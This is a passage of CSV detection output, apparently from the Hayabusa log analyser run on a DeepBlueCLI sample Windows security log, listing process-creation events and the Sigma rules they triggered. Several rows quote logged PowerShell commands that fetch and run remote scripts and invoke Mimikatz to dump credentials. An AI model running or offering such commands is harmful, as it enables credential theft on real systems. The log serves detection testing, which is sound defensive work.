Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.828 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.921 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:45.417 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:45.417 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:45.886 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:46.517 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:46.517 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:47.330 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:58:44.730 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:58:44.730 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:59:55.339 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:00:01.654 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:00:01.685 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:00:01.716 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:11:08.334 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:24:56.194 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:24:56.194 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.163 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.163 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.194 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.506 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.506 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.600 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.600 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.756 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.756 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:56.834 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:57.381 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:31:57.397 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:37:26.756 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 22:37:26.756 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:13:00.062 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:13:02.593 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:15:59.548 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:15:59.673 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:23:16.845 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:28:51.548 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:28:51.611 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:28:51.626 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:30:51.548 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 00:30:51.548 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 02:24:05.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:17:10.062 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:17:10.109 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:20:07.546 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:20:07.546 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:21:09.562 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:21:09.578 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,,PowerShell Web 